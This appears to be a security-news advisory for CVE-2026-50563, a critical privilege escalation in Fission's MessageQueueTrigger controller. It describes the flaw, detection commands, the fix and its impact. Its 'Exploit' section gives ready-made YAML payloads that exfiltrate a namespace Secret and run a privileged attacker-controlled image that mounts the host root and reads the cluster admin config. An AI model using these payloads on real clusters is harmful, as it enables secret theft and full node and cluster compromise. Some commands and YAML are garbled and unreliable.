Listen to this Post
How CVE-2026-50563 Works
Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.24.0, the MessageQueueTrigger (MQT) scaler controller contained two critical privilege-escalation vulnerabilities that could be exploited by any subject able to create MQTs in a namespace.
The first primitive, Secret materialization, existed in the `getEnvVarlist` function within pkg/mqtrigger/scalermanager.go. This function read the Secret named in `Spec.Secret` using the controller’s cluster-wide `secrets/get` RBAC permissions and emitted each key as a literal EnvVar.Value. This effectively copied plaintext secret content into the connector Deployment’s pod template. A subject holding only `messagequeuetriggers/create` permissions—but not secrets/get—could exfiltrate any Secret in the namespace by simply pointing an MQT at it.
The second primitive, PodSpec injection, was even more dangerous. `Spec.PodSpec` was merged into the controller-built connector PodSpec via `util.MergePodSpec` with no allowlist on which fields could come from the user. An MQT could substitute `Containers[].Image` (run any image), override Command/Args, inject Env, add `VolumeMounts` + Volumes, override ServiceAccountName, and set HostNetwork/HostPID/HostIPC. This turned `messagequeuetriggers/create` into effective `deployments/create` with an arbitrary image and service account.
A tenant with only `messagequeuetriggers.fission.io/create` in a namespace could read any Secret in that namespace and run an arbitrary container image under an arbitrary service account, escalating well beyond their intended RBAC. The vulnerability was patched in version 1.24.0 via PR 3367.
DailyCVE Form:
| | |
|||
| Platform | Fission |
| Version | <= 1.23.x |
| Vulnerability | Privilege Escalation via Secret Materialization + PodSpec Injection |
| Severity | Critical (CVSS 9.9) |
| Date | 2026-06-10 |
| Prediction | Patch released in v1.24.0 |
What Undercode Say:
Check Fission version
kubectl get deployment -n fission fission-controller -o jsonpath='{.spec.template.spec.containers[bash].image}'
List existing MessageQueueTriggers
kubectl get messagequeuetriggers.fission.io -A
Inspect an MQT's PodSpec injection
kubectl get mqt <name> -n <namespace> -o yaml | grep -A 20 "podSpec"
// pkg/mqtrigger/scalermanager.go - vulnerable function (pre-1.24.0)
func getEnvVarlist(secretName string, namespace string) ([]corev1.EnvVar, error) {
secret, err := kubernetesClient.CoreV1().Secrets(namespace).Get(context.TODO(), secretName, metav1.GetOptions{})
// Secret values are read and emitted as literal EnvVar.Value
for key, val := range secret.Data {
envVars = append(envVars, corev1.EnvVar{
Name: key,
Value: string(val), // PLAINTEXT LITERAL
})
}
return envVars, nil
}
// pkg/executor/util/merge_allowlist.go - new allowlist (v1.24.0+)
var MergeAllowedPodSpecFields = []string{
"NodeSelector",
"Tolerations",
"Affinity",
"RuntimeClassName",
"Resources", // per-container only
}
// All other user-supplied fields are dropped at the controller layer.
Exploit:
1. Secret Exfiltration
Create a malicious MessageQueueTrigger that points to a target Secret:
apiVersion: fission.io/v1
kind: MessageQueueTrigger
metadata:
name: secret-exfil
namespace: victim-ns
spec:
function:
name: dummy-func
namespace: victim-ns
secret: target-secret-name Any Secret in the namespace
podSpec: {} Minimal, just to trigger the controller
The controller would read the Secret using its cluster-wide permissions and embed its values directly into the connector Deployment’s pod template as literal environment variables, exposing them in the pod spec.
2. PodSpec Injection for Container Escape
Create an MQT that overrides the connector image and runs with host privileges:
apiVersion: fission.io/v1 kind: MessageQueueTrigger metadata: name: podspec-inject namespace: victim-ns spec: function: name: dummy-func namespace: victim-ns podSpec: containers: - name: connector image: docker.io/attacker/malicious:latest Attacker-controlled image command: ["/bin/sh"] args: ["-c", "cat /host/etc/kubernetes/admin.conf"] securityContext: privileged: true hostNetwork: true hostPID: true serviceAccountName: cluster-admin-sa If exists volumes: - name: host-root hostPath: path: / volumeMounts: - name: host-root mountPath: /host
Prior to v1.24.0, this MQT would be accepted and the connector pod would run with the attacker’s image, host networking, host PID namespace, and mount the host filesystem—allowing full node and cluster compromise.
Protection:
- Upgrade to Fission v1.24.0 or later immediately. The fix is released in version 1.24.0.
- Secret handling: `getEnvVarlist` now emits `EnvVar.ValueFrom.SecretKeyRef` so the connector pod resolves values at start time under its own service account. Secret values are never written into the Deployment object and never logged.
- PodSpec allowlisting: A new allowlist, `MergeAllowedPodSpecFields` (
pkg/executor/util/merge_allowlist.go), accepts onlyNodeSelector,Tolerations,Affinity,RuntimeClassName, and per-containerResources. All other user-supplied fields are dropped at the controller layer, and the validating webhook rejects every populated non-allowlisted field with a clear error. - Admission webhook: The webhook and the merge helper share a single canonical `DisallowedPodSpecFields` enumeration so they cannot drift.
- Audit existing MQTs: Before upgrading, audit all MessageQueueTriggers for `spec.podSpec` fields that override image, command, args, env, volumes, service account, or host namespaces. These will be rejected at admission (or silently dropped if the webhook is disabled).
Impact:
- Secret Exposure: Any user with `messagequeuetriggers/create` permissions could read any Secret in their namespace, including database credentials, API keys, TLS certificates, and service account tokens.
- Container Escape & Node Compromise: Attackers could run arbitrary container images with
privileged: true,hostNetwork,hostPID, andhostIPC, mounting the host filesystem and escaping the container sandbox. - Cluster-wide Compromise: By overriding `serviceAccountName` to a privileged service account (e.g., cluster-admin), attackers could gain full cluster administrative access.
- RBAC Bypass: The vulnerability effectively turned `messagequeuetriggers/create` into `deployments/create` with an arbitrary image and service account, completely bypassing intended RBAC boundaries.
- Persistent Backdoor: Attackers could establish persistent malicious connectors that continue to run even after the initial exploit, providing ongoing access to the cluster.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

